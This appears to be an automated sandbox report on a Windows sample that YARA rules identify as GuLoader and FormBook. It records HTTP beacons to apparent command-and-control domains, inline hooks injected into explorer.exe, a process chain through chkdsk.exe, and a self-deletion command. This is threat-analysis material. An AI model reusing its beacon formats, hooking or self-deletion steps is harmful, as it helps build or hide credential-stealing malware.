                                                                                Data Raw: 31 38 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 70 61 72 6b 65 64 20 62 79 20 49 6e 73 74 72 61 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 42 56 59 69 69 53 49 46 65 4b 31 64 47 6d 4a 52 41 6b 79 63 75 48 41 48 52 67 33 32 4f 6d 55 63 77 77 37 6f 6e 33 52 59 64 67 34 56 61 2b 50 6d 53 54 73 7a 2f 4b 36 38 76 62 64 45 6a 68 34 75 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 34 2e 37 2e 30 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 77 76 66 58 70 71 70 5a 5a 56 51 47 4b 36 54 41 68 35 50 56 6c 47 4f 66 51 4e 48 53 6f 44 32 78 62 45 2b 51 6b 50 78 43 41 46 6c 4e 45 65 76 6f 45 48 33 53 6c 30 73 69 62 56 63 4f 51 56 6e 4e 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 0d 0a 09 3c 73 74 79 6c 65 3e 0d 0a 09 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 7d 0d 0a 09 2a 3a 3a 61 66 74 65 72 2c 20 2a 3a 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 09 7d 0d 0a 09 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 25 3b 20 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4c 61 74 6f 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 20 7d 0d 0a 09 74 61 62 6c 65 20 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 25 3b 74 61 62 6c 65 2d 6c 61 79 6f 75 74 3a 73 74 61 74 69 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c
                                                                                Data Ascii: 18c4<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Domain parked by Instra</title><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="description" content="" /><meta name="keywords" content="" /><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"><link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous"><style>*{margin:0;padding:0; box-sizing: border-box;}*::after, *::before { box-sizing: border-box;}html, body {height:100%;width:100%; overflow-x: hidden;font-family: Lato, Arial, sans-serif; font-size: 16px; line-height: 1.42857 }table {height:100%;width:100%;table-layout:static;border-collapse:coll


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                7192.168.2.34976434.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 19, 2021 20:26:26.748606920 CEST6310OUTGET /nff/?D48p=BYCicstSjiimYQeLhOM2IfVFUU5xkRxUW/ddRKXtK0U5B2C8EeMnAtCjd12GxjTXIZnB&-ZgX=tR-DSFa8o HTTP/1.1
                                                                                Host: www.yellow-wink.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Jul 19, 2021 20:26:26.888226032 CEST6311INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Mon, 19 Jul 2021 18:26:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "60ef6795-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                8192.168.2.349765104.21.53.780C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 19, 2021 20:26:47.463435888 CEST6312OUTGET /nff/?-ZgX=tR-DSFa8o&D48p=CcVDHNb77dcNdWY2oqs0Q3cJ+rSEYLRnUCyMOMN+TEyN4HUBsnEuVHzuIckGNGmzeXmd HTTP/1.1
                                                                                Host: www.amazonautomationbusiness.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Jul 19, 2021 20:26:47.526154995 CEST6313INHTTP/1.1 301 Moved Permanently
                                                                                Date: Mon, 19 Jul 2021 18:26:47 GMT
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: max-age=3600
                                                                                Expires: Mon, 19 Jul 2021 19:26:47 GMT
                                                                                Location: https://www.elite-automation.com/nff/?-ZgX=tR-DSFa8o&D48p=CcVDHNb77dcNdWY2oqs0Q3cJ+rSEYLRnUCyMOMN+TEyN4HUBsnEuVHzuIckGNGmzeXmd
                                                                                cf-request-id: 0b619e584b000005c437099000000001
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0gA1jtTBtmBiivH5KleXovsqEuquzZF5t08%2BQrpQ%2FWzvfMFJNX%2Fay0Cb9fWwMXX3een%2BwWUeYokO2TG4Jduc9yWhhb4eHuT3bnZoO3wCn3S0jMhB9q71Kf4TaXFcOqAmAABKV4K7TVnR3y7J9pcEY3TNGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 67160006d94c05c4-FRA
                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                9192.168.2.34976645.33.252.4580C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 19, 2021 20:27:28.287453890 CEST6314OUTGET /nff/?-ZgX=tR-DSFa8o&D48p=cRGxEbCxtxOklbCQDq2naIaOwJUFKZbTk/bYH1mjDoD5ciZshsmVa8jbK15SYwAvUHmE HTTP/1.1
                                                                                Host: www.ooweesports.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Jul 19, 2021 20:27:28.510859966 CEST6314INHTTP/1.1 200 OK
                                                                                Transfer-Encoding: chunked
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                X-Powered-By: Nginx
                                                                                Date: Mon, 19 Jul 2021 18:27:23 GMT
                                                                                Connection: close
                                                                                Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                Data Ascii: 3


                                                                                HTTPS Packets

                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                Jul 19, 2021 20:22:21.737766981 CEST133.130.104.18443192.168.2.349746CN=www.kinmirai.org CN=GlobalSign GCC R3 DV TLS CA 2020, O=GlobalSign nv-sa, C=BECN=GlobalSign GCC R3 DV TLS CA 2020, O=GlobalSign nv-sa, C=BE CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R3Tue Jun 22 20:42:45 CEST 2021 Tue Jul 28 02:00:00 CEST 2020Mon Jul 26 07:45:48 CEST 2021 Sun Mar 18 01:00:00 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                CN=GlobalSign GCC R3 DV TLS CA 2020, O=GlobalSign nv-sa, C=BECN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R3Tue Jul 28 02:00:00 CEST 2020Sun Mar 18 01:00:00 CET 2029

                                                                                Code Manipulations

                                                                                User Modules

                                                                                Hook Summary

                                                                                Function NameHook TypeActive in Processes
                                                                                PeekMessageAINLINEexplorer.exe
                                                                                PeekMessageWINLINEexplorer.exe
                                                                                GetMessageWINLINEexplorer.exe
                                                                                GetMessageAINLINEexplorer.exe

                                                                                Processes

                                                                                Process: explorer.exe, Module: user32.dll
                                                                                Function NameHook TypeNew Data
                                                                                PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEC
                                                                                PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEC
                                                                                GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEC
                                                                                GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEC

                                                                                Statistics

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                Analysis Process: F63V4i8eZU.exe PID: 1288 Parent PID: 5504

                                                                                General

                                                                                Start time:20:20:39
                                                                                Start date:19/07/2021
                                                                                Path:C:\Users\user\Desktop\F63V4i8eZU.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\Desktop\F63V4i8eZU.exe'
                                                                                Imagebase:0x400000
                                                                                File size:271464 bytes
                                                                                MD5 hash:08730CDD286A4C9D46B38BB6545AC311
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:Visual Basic
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.316460586.00000000022A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Analysis Process: F63V4i8eZU.exe PID: 772 Parent PID: 1288

                                                                                General

                                                                                Start time:20:21:30
                                                                                Start date:19/07/2021
                                                                                Path:C:\Users\user\Desktop\F63V4i8eZU.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\Desktop\F63V4i8eZU.exe'
                                                                                Imagebase:0x400000
                                                                                File size:271464 bytes
                                                                                MD5 hash:08730CDD286A4C9D46B38BB6545AC311
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation:low

                                                                                Analysis Process: explorer.exe PID: 3388 Parent PID: 772

                                                                                General

                                                                                Start time:20:22:25
                                                                                Start date:19/07/2021
                                                                                Path:C:\Windows\explorer.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                Imagebase:0x7ff714890000
                                                                                File size:3933184 bytes
                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation:high

                                                                                Analysis Process: chkdsk.exe PID: 5756 Parent PID: 3388

                                                                                General

                                                                                Start time:20:22:42
                                                                                Start date:19/07/2021
                                                                                Path:C:\Windows\SysWOW64\chkdsk.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                                                Imagebase:0xe30000
                                                                                File size:23040 bytes
                                                                                MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001F.00000002.1285459135.0000000004FC5000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001F.00000002.1287054375.000000000596F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                Reputation:moderate

                                                                                Analysis Process: cmd.exe PID: 6112 Parent PID: 5756

                                                                                General

                                                                                Start time:20:22:46
                                                                                Start date:19/07/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:/c del 'C:\Users\user\Desktop\F63V4i8eZU.exe'
                                                                                Imagebase:0xbd0000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: conhost.exe PID: 5696 Parent PID: 6112

                                                                                General

                                                                                Start time:20:22:47
                                                                                Start date:19/07/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Disassembly

                                                                                Code Analysis

                                                                                Reset < >